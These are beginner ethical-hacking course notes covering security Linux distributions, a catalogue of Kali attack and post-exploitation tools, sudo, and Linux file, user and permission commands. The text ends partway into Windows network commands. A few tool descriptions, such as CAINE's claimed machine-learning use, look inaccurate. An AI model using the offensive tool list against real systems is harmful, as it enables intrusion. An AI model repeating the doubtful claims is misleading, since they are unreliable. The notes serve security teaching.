
Byte Capsule EHP

Week 1

01. EHP Introduction

What You Will Learn in the EHP Course


1. Hacking Basics
2. Scanning and Enumeration
3. Exploitation Basics with Practical
4. External Pentesting with practical
5. Exploit Development with practical
6. Active Directory Exploitation with practical
7. Web Application Exploitation with Practical
8. Wireless Network Exploitation with practical

02. EHP How to Maintain Classes

What to Do and What Not to Do


1. Be disciplined
2. Make a routine
3. Don't discuss inappropriate topics
4. Be cooperative with others
5. Be humble and don't be a show-off; demonstrate your smartness by solving problems
6. Uninstall unnecessary applications from your PC
7. Keep notes of classes (notebook, Google Keep)

Week 2 OS Fundamentals

03. EHP Installation Guideline of Linux

Set up the lab on a desktop or laptop


1. Either a desktop or a laptop can be used
2. Minimum 4 GB RAM (for basic practice and exploit development)
3. Recommended: 8 GB RAM, a Core i3 or Ryzen 5 processor, and a 2 GB GPU
4. 256 GB SSD or 1 TB HDD
5. Parrot OS / Kali Linux / Windows 7 / Windows 10 is recommended for the lab
6. Set up the lab on VirtualBox / VMware / a bootable pendrive
7. For a lab on a pendrive, 16 GB is recommended

04. EHP Introduction to Linux

Linux distributions for ethical hacking and


penetration testing
Linux distributions, often referred to as Linux distros, are operating systems that come preloaded
with a wide range of ethical hacking and penetration testing tools. These distros are commonly used
by security researchers, penetration testers, and ethical hackers to conduct various security
assessments for organizations.

Whether you're aiming for a career in cybersecurity or simply want to explore the world of
penetration testing, there's a Linux distribution tailored to meet your needs.

1. Parrot Security OS
Parrot Security OS targets penetration testers and certified security personnel, but it also aims to
help those who need a privacy-focused distro such as journalists and ethical hackers.

What sets Parrot Security apart from other Linux distributions is that it offers an array of privacy
tools and encryption features.

It even offers a home edition that anyone can use to stay secure online. It also comes with a digital
forensics tab that was built in collaboration with the developers of CAINE.

Download Parrot Security OS

2. Kali Linux
Kali Linux is an excellent choice for those new to penetration testing, while also remaining a go-to
distro for seasoned professionals in ethical hacking. Built on the Debian operating system, Kali uses
the Xfce desktop environment and comes preloaded with a comprehensive set of penetration testing
tools.

Its flexibility makes it a favorite among experts, as it allows users to create custom Kali-based
distros tailored to specific needs. Kali Linux also benefits from a large community, offering extensive
documentation and user-generated tutorials to support both beginners and advanced users.

Download Kali Linux

3. BackBox Linux
BackBox Linux is an Ubuntu-based distribution designed for security assessments and penetration
testing. It includes a broad set of tools for web application and network analysis, making it a powerful
choice for security professionals.

BackBox is also beginner-friendly, with helpful tooltips and descriptions for each included tool, which
makes navigating its application menu easier, even for users who are new to penetration testing.
This user-friendly approach ensures that you can quickly find the tools you need to get started.

Download BackBox Linux

4. BlackArch Linux
BlackArch is a favorite among experienced security researchers and penetration testers due to its
vast collection of tools—over 2,000, in fact. While its user interface may not be the most beginner-
friendly, the well-organized repository makes it easy to navigate and find the tools you need.

BlackArch is regularly updated with new tools and improvements, maintaining its status as one of the
most comprehensive and popular Linux distros for ethical hacking and penetration testing. It's ideal
for professionals who need a robust toolkit for advanced security assessments.

Download BlackArch Linux

5. ArchStrike
ArchStrike (formerly known as ArchAssault) is a penetration testing and cybersecurity-focused
project built on Arch Linux. It combines the flexibility and power of Arch Linux with a comprehensive
set of tools specifically for security professionals and penetration testers.

ArchStrike includes thousands of tools and applications, organized into modular package groups,
allowing users to easily access the tools they need for various security tasks.

Whether you're conducting penetration tests, vulnerability assessments, or other cybersecurity


operations, ArchStrike provides a robust platform with the best of Arch Linux and an extensive toolkit
for the job.

Download ArchStrike

6. Fedora Security Spin


Fedora Security Spin is a specialized version of Fedora designed for security auditing, penetration
testing, and educational purposes.

This distribution is designed to support students and instructors as they practice and learn various
security methodologies, including information security, web application security, forensic analysis, and more.

With its focused toolset and robust support for security education, Fedora Security Spin provides an
ideal environment for both hands-on learning and professional security assessments.

Download Fedora Security Spin

7. Pentoo Linux
Pentoo is an excellent choice for users who are already familiar with Gentoo or are willing to invest
time in learning it. This distribution can be installed as an overlay on an existing Gentoo system or
run as a standalone OS.

However, Pentoo may not be ideal for beginners in penetration testing, as it comes with a steep
learning curve and a less structured organization that could be overwhelming for newcomers.
Additionally, it has limited documentation and support, which may pose a challenge for those new to
ethical hacking.

Despite these drawbacks, Pentoo remains popular among Gentoo enthusiasts and experienced
users who appreciate its flexibility and powerful toolset.

Download Pentoo Linux

8. Caine
Once you've gained some experience in penetration testing, CAINE (Computer-Aided Investigation
Environment) could be a valuable addition to your toolkit. Designed to simplify the process of
analyzing disks and drives, CAINE leverages automation to generate detailed reports, making it an
excellent resource for security teams.

Built on Ubuntu, CAINE is also well-suited for testing machine learning environments, a rapidly
growing area. Its focus on digital forensics and automation makes it a strong choice for more
advanced penetration testing and cybersecurity tasks.

Download Caine

9. Network Security Toolkit (NST)


NST (Network Security Toolkit) is a bootable live DVD/USB flash drive that provides a comprehensive
suite of free, open-source security and networking tools. It’s designed to help teams perform
everything from routine security diagnostics to more advanced penetration testing operations.

Built for use in virtual machines, NST is ideal for tasks like analysis, validation, and monitoring of
networks. Its "all-in-one" toolkit makes it popular among ethical hackers, professional penetration
testers, and even beginners, as it offers a wide range of tools to address various security needs in a
single, easy-to-use package.

Download Network Security Toolkit

10. Bugtraq
Bugtraq is a penetration testing distribution specifically designed for reverse engineering and
malware analysis. Based on Debian, this versatile distro is available for multiple operating systems
and provides excellent support for penetration testers.

Bugtraq comes preloaded with a variety of analysis tools, including mobile forensics, malware
testing, and other specialized features. All of these tools are developed and maintained by the
Bugtraq community, making it a valuable resource for those focused on security research, malware
analysis, and reverse engineering.

Download Bugtraq

11. DEFT Linux


DEFT (Digital Evidence and Forensic Toolkit) is an open-source Linux distribution based on Ubuntu,
designed for digital forensics and incident response. It is built around the DART (Digital Advanced
Response Toolkit) software and comes preconfigured with a wide range of popular forensic tools and
resources.

DEFT is tailored for ethical hackers, penetration testers, IT security professionals, and others who
need to conduct digital investigations, analyze evidence, and respond to security incidents
effectively. With its comprehensive toolkit, DEFT is a valuable resource for anyone involved in digital
forensics and cybersecurity.

Download DEFT Linux

05. EHP Exploring Kali Linux

Exploring Kali Linux


The most advanced Penetration Testing Distribution. Kali Linux is an open-source, Debian-based
Linux distribution geared towards various information security tasks, such as Penetration Testing,
Security Research, Computer Forensics and Reverse Engineering.

The Kali Linux penetration testing platform contains a vast array of tools and utilities. From
information gathering to final reporting, Kali Linux enables security and IT professionals to assess
the security of their systems.

Find out all about Kali's Tools

Kali Linux comes with a wide range of pre-installed tools, categorized into different groups based on
their purpose. Here's a list of the main categories of tools in Kali Linux, which are commonly used for
penetration testing, ethical hacking, and cybersecurity assessments:

1. Information Gathering
Tools for gathering information about the target, such as network infrastructure, open ports, and
services.

• nmap – Network scanner and discovery tool


• whois – Domain and WHOIS information lookup
• theHarvester – Email and domain gathering
• dnsrecon – DNS enumeration tool
• nikto – Web server scanner

2. Vulnerability Analysis
Tools for identifying and analyzing vulnerabilities in systems, networks, or applications.

• OpenVAS – Vulnerability scanner


• Nessus – Commercial vulnerability scanner (trial version)
• Nikto – Web server scanner for vulnerabilities
• wpscan – WordPress vulnerability scanner
• Metasploit Framework – Exploit framework for penetration testing

3. Exploitation Tools
Tools to exploit discovered vulnerabilities in systems and networks.

• Metasploit Framework – Exploit and payload creation framework
• BeEF – Browser Exploitation Framework
• Armitage – GUI front-end for Metasploit
• Social Engineering Toolkit (SET) – Phishing, social engineering, and attack framework

4. Wireless Attacks
Tools for attacking and analyzing wireless networks.

• Aircrack-ng – Wireless network cracking tool (WEP/WPA)
• Kismet – Wireless network detector and sniffer
• Reaver – WPA/WPA2 attack tool (WPS PIN brute-force)
• Wifite – Automated wireless network attack tool

5. Web Application Analysis


Tools for discovering vulnerabilities in web applications, such as SQL injection, cross-site scripting
(XSS), and more.

• Burp Suite – Web application security testing framework
• OWASP ZAP – Web application security scanner
• dirbuster – Directory and file brute-forcing tool
• sqlmap – Automated SQL injection and database takeover tool
• w3af – Web application attack and audit framework

6. Password Attacks
Tools used for password cracking, brute forcing, and dictionary attacks.

• John the Ripper – Password cracking tool
• Hydra – Network logon cracker supporting various protocols
• Hashcat – Advanced password cracking tool
• Medusa – Parallel brute-force login cracking tool

7. Post Exploitation
Tools for maintaining control, gathering information, or escalating privileges after initial system
compromise.

• meterpreter – Advanced payload for post-exploitation tasks (part of Metasploit)
• Empire – PowerShell post-exploitation and agent-based framework
• Cobalt Strike – Commercial post-exploitation and red-team framework

8. Forensics
Tools for digital forensics analysis, data recovery, and investigation.

• Autopsy – Digital forensics platform
• Sleuth Kit – Collection of command-line tools for digital forensics
• Binwalk – Firmware analysis tool
• Volatility – Memory forensics framework
• Xplico – Network forensics analysis tool

9. Reverse Engineering
Tools for analyzing malware, unpacking binaries, and reverse engineering applications.

• Ghidra – Software reverse engineering suite (developed by the NSA)
• Radare2 – Open-source framework for reverse engineering
• IDA Pro – Commercial disassembler and debugger
• OllyDbg – 32-bit assembler-level debugger
• Frida – Dynamic instrumentation toolkit

10. Sniffing & Spoofing


Tools for intercepting and manipulating network traffic.

• Wireshark – Network protocol analyzer
• Ettercap – Man-in-the-middle attack tool
• dsniff – Network sniffer for network traffic analysis
• tcpdump – Command-line packet analyzer
• mitmproxy – Interactive man-in-the-middle proxy for HTTP/S traffic

11. Social Engineering Tools


Tools designed for social engineering attacks and phishing.

• Social Engineering Toolkit (SET) – Framework for social engineering attacks
• FakeAP – Fake access point creation tool
• Evilgrade – Tool for exploiting software update mechanisms
• PhishX – Phishing framework for testing email security

12. Maintaining Access


Tools for creating and maintaining persistent access to compromised systems.

• netcat (nc) – Utility for creating raw network connections and reverse shells
• Persistence scripts – Tools for maintaining access on target systems
• Mettle – Metasploit's multi-platform payload for maintaining access

13. Cloud Security


Tools for auditing and securing cloud environments.

• CloudBrute – Brute-force tool for cloud services
• Prowler – AWS security auditing tool
• CLOUDWOLF – Cloud security monitoring tool

14. Reporting Tools


Tools that assist in generating reports from security assessments and penetration tests.

• Dradis – Collaboration and reporting tool for pentesting
• MagicTree – Pentest data management and reporting tool
• Faraday – Collaborative penetration testing environment
• KeepNote – Note-taking and organizing tool for security professionals

15. Miscellaneous Tools


A variety of additional tools for specialized tasks.

• Netdiscover – Network discovery tool
• Macchanger – MAC address changer
• Proxychains – Force applications to use a proxy
• Tshark – Command-line version of Wireshark

These are the main categories of tools found in Kali Linux. Kali includes many other tools beyond
these categories, each serving different aspects of penetration testing, cybersecurity, and digital
forensics. Kali Linux offers a comprehensive suite that makes it one of the go-to distributions for
ethical hackers, penetration testers, and security professionals.

06. EHP Sudo Overview

Overview of sudo
sudo (short for "SuperUser Do") is a command-line utility used in Unix-like operating systems (such
as Linux and macOS) to allow a permitted user to execute a command as the superuser (root) or
another user, as specified by security policy. It provides a mechanism for delegated administrative
control and helps protect systems by limiting direct access to root privileges.

Key Features of sudo:


1. Execute Commands as Root or Another User:

The most common use of sudo is to execute commands with superuser (root) privileges. This is
essential for performing administrative tasks like installing software, modifying system files, or
managing system services.

Example:

sudo apt-get update # Update package lists on a Debian-based system


sudo systemctl restart apache2 # Restart a service (e.g., Apache)

2. Controlled Access:

sudo provides granular control over who can execute what commands, and under what conditions.
This is managed through the /etc/sudoers file, which is edited using visudo to ensure syntax integrity.
Only users who are listed in this file (or in group memberships) can run commands with elevated
privileges.

3. Logging:

Every command run through sudo is logged, which helps in auditing and tracking who did what on
the system. These logs can be found in /var/log/auth.log or /var/log/sudo depending on the system
configuration.

4. Timeout:

After a user enters their password to execute a command with sudo, a timestamp is set. For a
configurable time period (5 minutes by default), they won't need to enter the password again for
additional sudo commands.

5. Security and Best Practices:

• By using sudo, users are not granted full access to the root account, but instead can run specific
commands as root. This minimizes the risk of accidental system-wide damage and protects against
malicious activities that could result from using a root shell directly.

• sudo reduces the chances of mistakes made while logged in as root, especially since the root
account can be disabled in some systems for extra security.

Basic Syntax:

sudo [OPTION] COMMAND [ARGUMENTS...]

• OPTION: Flags or options for modifying the behavior of sudo.


• COMMAND: The command to run with elevated privileges.
• ARGUMENTS: Any arguments the command requires.

Common sudo Commands and Options:

1. Running a Command as Another User:


sudo -u username command_to_run

Example:
sudo -u john ls /home/john # Run the `ls` command as user 'john'

2. No Password Prompt (Dangerous - Use with Caution): You can configure sudo to not ask for a
password when running commands. This is done by modifying the /etc/sudoers file, but should be
used cautiously.

username ALL=(ALL) NOPASSWD: ALL

3. Editing Files as Root: Using sudo to open an editor (e.g., vi, nano) with root privileges to modify
system files:

sudo nano /etc/hosts # Edit the hosts file as root

4. Checking the User's Privileges: You can check which commands a user is allowed to run via sudo
by using:

sudo -l

5. View the Sudoers File (use visudo for safety):

sudo visudo

6. Revoke sudo Access: If you need to revoke a user's sudo privileges, you would remove them from
the relevant sudoers group or file.

Security Considerations:
• Least Privilege Principle: Always assign only the minimum necessary privileges to users.

• Passwordless sudo: Disabling the password prompt can be risky, so it's advisable to limit this
practice unless there’s a specific use case.

• Sudoers File Management: Mistakes in the /etc/sudoers file can lock you out of administrative
privileges. Always use visudo, which checks for syntax errors before saving.
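As a sketch of the least-privilege principle, a sudoers drop-in file granting a hypothetical user deploy the right to run exactly one command (the username and command here are illustrative, not from the course material) could look like:

```
# /etc/sudoers.d/deploy (always edit with: sudo visudo -f /etc/sudoers.d/deploy)
# Hypothetical entry: let user 'deploy' restart Apache as root, without a password,
# and nothing else.
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
```

Because the command is spelled out in full, deploy cannot use this entry to run any other program as root.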

Example Use Cases:

1. System Update:
sudo apt update && sudo apt upgrade # Update packages on a Debian-based system

2. Add a User:
sudo useradd -m newuser # Create a new user

3. Restart a Service:
sudo systemctl restart apache2 # Restart the Apache service

4. Access Files and Directories:


sudo chmod 777 /path/to/file # Change file permissions
sudo chown root:root /path/to/file # Change file ownership

Conclusion:
sudo is an essential tool in Unix-like systems for safely managing administrative tasks without the
need to switch to the root account. It offers an extra layer of security, flexibility, and accountability
by allowing users to execute commands as root or another user with specific permissions.

07. EHP Navigating the file system

Navigating the file system


Navigating the Linux file system involves moving through directories, viewing files, and managing
file system structures using commands in the terminal. The file system is organized hierarchically,
with the root directory (/) at the top, and all files and directories are organized beneath it.

Key Concepts:

• pwd: Shows the current working directory.


• ls: Lists the contents of a directory.
• cd: Changes the current directory.
• ~: Represents the home directory of the current user.
• / (Root): The root directory, which is the starting point of the file system.
• File paths: Can be absolute (starting from /) or relative (from the current directory).

Common Commands:

• cd /path/to/directory: Change to a specific directory.


• ls: List files and directories.
• pwd: Print the current directory path.
• mkdir: Create a new directory.
• rm: Delete files.
• cp: Copy files or directories.
• mv: Move or rename files.
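Taken together, a typical navigation session might look like this (a minimal sketch, run from any writable directory; the directory and file names are illustrative):

```shell
mkdir -p projects/notes    # create a nested directory tree
cd projects/notes          # move into the new directory
pwd                        # prints the absolute path, ending in /projects/notes
touch todo.txt             # create an empty file here
ls                         # prints: todo.txt
cd ../..                   # go back up two levels to where we started
```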

Understanding these commands allows you to explore, manage, and manipulate files and directories
on a Linux system efficiently.

Here are examples for navigating the Linux file system:

1. pwd (Print Working Directory)
Purpose: Tells you where you are in the file system.

Usage:
>> pwd

2. ls (List)
Purpose: Lists the contents of the current directory.

Usage:
>> ls

3. cd (Change Directory)
Purpose: Move between directories.

Usage:
>> cd /path/to/directory

4. cd ~ (Home Directory)
Purpose: Quickly go to your home directory.

Usage:
>> cd ~

5. cd .. (Parent Directory)
Purpose: Go one level up in the directory tree.

Usage:
>> cd ..

6. ls -l (Long Listing)
Purpose: Lists files with detailed information (permissions, owner, size, date).

Usage:
>> ls -l

7. ls -a (Show Hidden Files)


Purpose: Show files that begin with a dot (hidden files).

Usage:
>> ls -a

8. mkdir (Make Directory)


Purpose: Create a new directory.

Usage:
>> mkdir new_directory

9. rmdir (Remove Directory)


Purpose: Remove an empty directory.

Usage:
>> rmdir directory_name

10. rm (Remove File)
Purpose: Delete a file.

Usage:
>> rm file_name

11. find (Search for Files)


Purpose: Find files by name or other attributes.

Usage:
>> find /path/to/search -name "filename"
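A self-contained find example (the directory and file names are made up for the demo):

```shell
mkdir -p search_demo/sub              # build a small directory tree
touch search_demo/sub/target.txt      # the file we will search for
find search_demo -name "target.txt"   # prints: search_demo/sub/target.txt
```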

12. locate (Quick File Search)


Purpose: Quickly search for files based on a database.

Usage:
>> locate filename

13. cp (Copy Files/Directories)


Purpose: Copy files or directories from one place to another.

Usage:
>> cp source_file destination

For directories, use -r to copy recursively:

>> cp -r source_directory destination

14. mv (Move/Rename Files/Directories)


Purpose: Move or rename files and directories.

Usage:
>> mv old_name new_name # Rename a file
>> mv file_name /new/path # Move a file

15. cat (Concatenate and View Files)


Purpose: Display the contents of a file.

Usage:
>> cat filename

16. more (View Files Page-by-Page)


Purpose: View long files one page at a time.

Usage:
>> more filename

17. less (View Files with Navigation)


Purpose: Similar to more, but allows scrolling up and down.

Usage:
>> less filename

18. head (View the Start of a File)
Purpose: Display the first few lines of a file (default: 10).

Usage:
>> head filename

19. tail (View the End of a File)


Purpose: Display the last few lines of a file (default: 10).

Usage:
>> tail filename
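A quick sketch of head and tail together on a generated file:

```shell
seq 1 20 > nums.txt   # write the numbers 1..20, one per line
head -n 3 nums.txt    # prints lines 1, 2, 3
tail -n 2 nums.txt    # prints lines 19, 20
```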

20. df (Disk Free)


Purpose: Display available disk space on file systems.

Usage:
>> df -h

21. du (Disk Usage)


Purpose: Show the disk usage of files and directories.

Usage:
>> du -sh directory_name

22. tree (Display Directory Tree)


Purpose: Show directories and files in a tree-like structure.

Usage:
>> tree

23. stat (Display File or File System Status)


Purpose: Shows detailed information about a file or file system, including access times, permissions,
and disk block usage.

Usage:
>> stat filename

24. file (Determine File Type)


Purpose: Tells you the type of a file (e.g., whether it’s a regular file, directory, symbolic link, or
something else).

Usage:
>> file filename

25. touch (Create Empty Files or Update Timestamps)


Purpose: Create a new, empty file or update the timestamp of an existing file (i.e., access and
modification times).

Usage:
>> touch new_file

26. basename (Strip Directory and Suffix from Filename)

Purpose: Extract the file name from a path, or remove a file extension (suffix).

Usage:
>> basename /path/to/file.txt # Outputs: file.txt
>> basename /path/to/file.txt .txt # Outputs: file

27. dirname (Extract Directory Path)


Purpose: Get the directory portion of a file path, effectively removing the filename.

Usage:
>> dirname /path/to/file.txt # Outputs: /path/to

28. which (Find the Location of Executable Files)


Purpose: Shows the full path of a command or program in the directories listed in the system’s
$PATH.

Usage:
>> which command_name

29. whereis (Locate Binary, Source, and Manual Pages)


Purpose: Find the binary, source, and manual pages for a command.

Usage:
>> whereis command_name

30. history (Show Command History)


Purpose: Displays a list of previously executed commands. You can use this to re-run commands
easily.

Usage:
>> history

31. !<number> (Execute Command from History)


Purpose: Re-run a command from your history list using its number.

Usage:
>> !15 # Run the command listed as number 15 in your history

32. alias (Create Command Aliases)


Purpose: Create shortcuts or custom commands. You can alias long commands to make them easier
to run.

Usage:
>> alias ll='ls -l' # Create an alias for 'ls -l' to be run as 'll'

33. unalias (Remove Command Aliases)


Purpose: Remove previously created aliases.

Usage:
>> unalias ll # Removes the 'll' alias

34. mount (Mount Filesystems)


Purpose: Mount file systems (e.g., external drives, network shares).

Usage:
>> sudo mount /dev/sdb1 /mnt/mydrive # Mount a drive to a specific directory

35. umount (Unmount Filesystems)


Purpose: Unmount file systems (e.g., external drives).

Usage:
>> sudo umount /mnt/mydrive

36. chattr (Change File Attributes)


Purpose: Set or unset special attributes on files or directories, such as making a file immutable.

Usage:
>> sudo chattr +i filename # Make a file immutable (cannot be modified, deleted, etc.)
>> sudo chattr -i filename # Remove the immutable flag

37. fuser (Identify Processes Using a File or Directory)


Purpose: Identify processes that are using a specific file or directory.

Usage:
>> fuser filename # Displays the process ID(s) using the file
>> fuser -k filename # Kill processes using the file

38. mount -o loop (Mount ISO Images)


Purpose: Mount ISO files (e.g., CD/DVD images) to a directory.

Usage:
>> sudo mount -o loop /path/to/file.iso /mnt/iso

39. lsblk (List Block Devices)


Purpose: List information about all available or the specified block devices (e.g., hard drives, SSDs,
USB drives).

Usage:
>> lsblk

40. blkid (Display Block Device Information)


Purpose: Show detailed information about block devices, including UUIDs and filesystem types.

Usage:
>> blkid

41. rsync (Remote Sync and File Transfer)


Purpose: Sync files or directories between locations, either locally or over a network. It’s efficient
because it only transfers changes.

Usage:
>> rsync -av source_directory/ destination_directory/
>> rsync -avz source_directory/ user@remote_host:/path/to/destination/

42. tar (Archive and Extract Files)


Purpose: Create and extract compressed archive files (tarballs).

Usage:
>> tar -cvf archive.tar directory_name # Create a tarball (archive)
>> tar -xvf archive.tar # Extract a tarball
>> tar -czvf archive.tar.gz directory_name # Create a compressed tarball
>> tar -xzvf archive.tar.gz # Extract a compressed tarball
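The create/extract pair can be verified with a small round trip (file names are illustrative):

```shell
mkdir -p demo_dir
echo "hello" > demo_dir/a.txt
tar -czf demo.tar.gz demo_dir   # archive and compress the directory
rm -r demo_dir                  # remove the original copy
tar -xzf demo.tar.gz            # extract: demo_dir/a.txt is restored
cat demo_dir/a.txt              # prints: hello
```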

43. gzip/gunzip (Compress/Decompress Files)


Purpose: Compress and decompress files using the gzip format.

Usage:
>> gzip filename # Compress file
>> gunzip filename.gz # Decompress file
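Note that gzip replaces the original file with a .gz file, and gunzip reverses that; a minimal round trip:

```shell
echo "sample data" > data.txt
gzip data.txt        # data.txt is replaced by data.txt.gz
gunzip data.txt.gz   # data.txt.gz is replaced by data.txt
cat data.txt         # prints: sample data
```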

44. bzip2/bunzip2 (Compress/Decompress Files with bzip2)


Purpose: Compress and decompress files using the bzip2 format (higher compression ratio than
gzip).

Usage:
>> bzip2 filename # Compress file
>> bunzip2 filename.bz2 # Decompress file

45. zip/unzip (Zip and Unzip Files)


Purpose: Create or extract zip archives.

Usage:
>> zip archive.zip file1 file2 # Create a zip archive
>> unzip archive.zip # Extract a zip archive

46. mount -t (Specify Filesystem Type)


Purpose: Mount a device or partition with a specified filesystem type.

Usage:
>> sudo mount -t ext4 /dev/sdb1 /mnt/mydrive # Mount with a specific filesystem type (ext4 in this
case)

47. lsmod (List Loaded Kernel Modules)


Purpose: Shows all loaded kernel modules. This is useful for understanding which drivers or modules
are active.

Usage:
>> lsmod

48. dmesg (Display Kernel Ring Buffer)


Purpose: Displays messages from the kernel (useful for troubleshooting hardware issues).

Usage:
>> dmesg

49. lsof (List Open Files)


Purpose: List all open files and the corresponding processes that opened them. This is helpful for
finding out which processes are using a file.

Usage:
>> lsof filename

50. mount | grep (Filter Mounted Filesystems)


Purpose: Display all mounted file systems, or filter results for a specific one.

Usage:
>> mount | grep /mnt

51. df -i (Display Inode Usage)


Purpose: Show inode usage on mounted filesystems. This is useful when you run out of inodes, not
just disk space.

Usage:
>> df -i

Conclusion
With these commands, you have a comprehensive toolkit to navigate and manage the Linux file
system effectively. These commands cover everything from basic navigation to advanced system
administration tasks. Keep this reference handy for when you need to perform routine tasks or
troubleshoot issues!

08. EHP Users and Privileges

Users and Privileges


1. What is a User in Linux?

In Linux, a user is anyone or anything that interacts with the system. A user could be a person, a
service, or a process. Each user has a unique identity and access level.

2. Types of Users

Root User (Superuser):

• The root user has unlimited privileges to do anything on the system (e.g., install software, change
configurations, manage files).

• The root user has ID 0 (UID=0).

• Be cautious: Root has the power to break things easily if used incorrectly.

Regular Users:

• Regular users have restricted access compared to the root user. They can access only their files
and directories, and any system-wide actions require elevated permissions (e.g., via sudo).

System Users:

• These users are created by the system for specific services or applications (e.g., www-data for web
services). These users don’t log in but are used by processes.
3. Understanding User Accounts
User Name (Login Name):
This is the name you use to log in, e.g., john, alice, or admin.

User ID (UID):
Every user has a User ID (UID), which is a unique number associated with the user. For example:

• UID 0 is reserved for the root user.


• Regular users typically start from UID 1000.
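These IDs are easy to inspect with the id command:

```shell
id -u root   # prints: 0  (root's UID is always 0)
id -u        # prints the UID of the current user
```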

Group Name:

• Each user is also associated with a primary group. This is a collection of users that share common
permissions.

Home Directory:

• This is where a user's personal files are stored. It's usually located at /home/<username>, e.g.,
/home/john.

Shell:

• The shell is the command-line interface that the user interacts with (e.g., bash, zsh).

4. Managing Users

Creating a New User


>> sudo useradd <username>

This creates a new user but does not set a password.

Setting a Password
>> sudo passwd <username>

Deleting a User
>> sudo userdel <username>

Deletes the user account. Use sudo userdel -r <username> to remove the user's home directory as
well.

5. Groups in Linux
Groups allow you to manage permissions for multiple users easily. A group is a collection of users
that share common access rights to files, directories, and resources.

Creating a New Group


>> sudo groupadd <groupname>

Adding a User to a Group


>> sudo usermod -aG <groupname> <username>

This adds an existing user to an existing group.

Listing Groups a User Belongs To
>> groups <username>

6. Privileges and Permissions


In Linux, file access is controlled by file permissions, which specify who can read, write, or execute a
file. File permissions are represented by a combination of symbols (r, w, x) or numeric values (octal
notation).

Symbolic Representation:

r = read
w = write
x = execute

Permissions Overview
• r (read): Allows the user to view the contents of a file.
• w (write): Allows the user to modify or delete the file.
• x (execute): Allows the user to run the file as a program.

Each file or directory has three permission sets:

1. Owner (the user who owns the file)
2. Group (users in the file’s group)
3. Others (everyone else)

Example: -rwxr-xr-- indicates the owner has read, write, and execute permissions; the group has read and execute permissions; and others have only read permission.

Numeric (Octal) Representation:

r=4
w=2
x=1
Example: 755 means:

Owner: 7 (rwx) = 4+2+1


Group: 5 (r-x) = 4+0+1
Others: 5 (r-x) = 4+0+1

Changing Permissions:

chmod 755 file: Sets permissions to rwxr-xr-x.

Changing Ownership:

chown owner:group file: Changes the owner and group of a file.


Example: chown user1:user1 file.txt

Checking Permissions
Use ls -l to view permissions:
>> ls -l <filename>

Example output:
-rwxr-xr-- 1 john john 1234 Nov 24 12:00 example.txt

• The first character (-) indicates it's a file (a 'd' would indicate a directory).
• rwx = Owner has read, write, and execute permissions.
• r-x = Group has read and execute permissions.
• r-- = Others have only read permissions.

Changing Permissions (chmod)


chmod command allows you to change file permissions.

Usage:
>> chmod +x file_name # Add execute permission
chmod 755 file_name # Set specific permissions

Numeric Mode: Each permission has a number:

r = 4, w = 2, x = 1
Combine them: 7 = rwx, 6 = rw-, 5 = r-x, 4 = r--, etc.

Example:
>> chmod 755 <filename> # rwxr-xr-x

Symbolic Mode: You can also modify permissions using letters:

>> chmod u+x <filename> # Add execute permission for the user (owner)
>> chmod g-w <filename> # Remove write permission from the group
>> chmod o=r <filename> # Set read-only permission for others
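Numeric and symbolic modes can be tried safely on a throwaway file and verified with stat (a minimal sketch; assumes GNU coreutils):

```shell
f=$(mktemp)              # scratch file
chmod 755 "$f"           # numeric mode: rwxr-xr-x
stat -c '%a %A' "$f"     # prints: 755 -rwxr-xr-x
chmod g-x,o= "$f"        # symbolic mode: drop group execute, clear others
stat -c '%a' "$f"        # prints: 740
rm -f "$f"
```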

Changing File Ownership (chown)

Use chown to change the owner and group of a file.


>> sudo chown <user>:<group> <filename>

Example: sudo chown john:admin example.txt changes the owner to john and the group to admin.

7. Special Permissions

SUID (Set User ID):

Allows a program to run with the privileges of the file’s owner (usually root).
Indicated by an s in the execute position for the owner:

>> chmod u+s <filename>

SGID (Set Group ID):

Similar to SUID, but the program runs with the group privileges.
Indicated by an s in the execute position for the group:

>> chmod g+s <filename>

Sticky Bit:
Restricts file deletion in a shared directory to the file owner, not anyone with write permission.
Indicated by a t in the execute position for others:

>> chmod +t <directory>
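These bits can be observed without touching system files by setting them on throwaway paths (a sketch; assumes GNU coreutils):

```shell
d=$(mktemp -d)
touch "$d/prog"
chmod 644 "$d/prog"
chmod u+s,g+s "$d/prog"    # set SUID and SGID
stat -c '%a %A' "$d/prog"  # prints: 6644 -rwSr-Sr-- (capital S: no execute bit underneath)
chmod +t "$d"              # sticky bit on the directory
stat -c '%A' "$d"          # ends in 't' (or 'T' if others lack execute)
ls -ld /tmp                # real-world case: /tmp is normally drwxrwxrwt
rm -r "$d"
```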

8. Using sudo for Privilege Escalation

sudo allows regular users to execute commands with elevated (root) privileges.

Example:
>> sudo apt-get update # Run as root

You will be prompted for your password, and you can run sudo commands only if your user is listed
in the sudoers file (commonly via membership in the sudo group).

Adding a User to the sudo Group


>> sudo usermod -aG sudo <username>

9. Conclusion: A Quick Recap

• Users: Root (superuser), regular users, and system users.


• Groups: Groups help manage permissions for multiple users.
• Permissions: Read (r), Write (w), Execute (x). Use chmod, chown to manage them.
• Special Permissions: SUID, SGID, Sticky bit for advanced control.
• sudo: Grants temporary root privileges for trusted users.

By keeping these basic principles in mind, you can manage users and privileges effectively on any
Linux system, whether you're a beginner or an advanced user.

09. EHP Common Network Commands

Common Network Commands


https://github.com/cambridgeitcollege/CMD-Commands

1. Command: ipconfig (for Windows)

Description: Displays the current network configuration details, such as IP address, subnet mask, and
default gateway of network adapters.

Example:
$ ipconfig

Output:
Windows IP Configuration

Ethernet adapter Ethernet:
   Connection-specific DNS Suffix . : example.local
   IPv4 Address. . . . . . . . . . . : 192.168.1.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1

2. Command: tracert

Description: Traces the route taken by packets to a destination host, showing the intermediate
routers.

Example:

$ tracert google.com

Output:
Tracing route to google.com [142.250.72.238]
over a maximum of 30 hops:

1 <1 ms <1 ms <1 ms 192.168.1.1


2 7 ms 6 ms 7 ms isp-gateway.example.com [203.0.113.1]
3 12 ms 13 ms 11 ms 142.250.72.238

3. Command: netstat

Description: Displays active network connections, listening ports, and associated network statistics.

Example:
$ netstat

Output:
Active Connections

Proto Local Address Foreign Address State


TCP 192.168.1.10:49238 example.com:80 ESTABLISHED
TCP 192.168.1.10:49239 example.com:443 TIME_WAIT

4. Command: nslookup

Description: Resolves domain names to IP addresses or vice versa.

Example:
$ nslookup google.com

Output:
Server: dns.google
Address: 8.8.8.8

Non-authoritative answer:
Name: google.com
Address: 142.250.72.238

5. Command: hostname

Description: Displays or sets the computer's hostname.

Example:
$ hostname

Output:
my-computer

6. Command: arp

Description: Displays and modifies the ARP (Address Resolution Protocol) table, showing the mapping
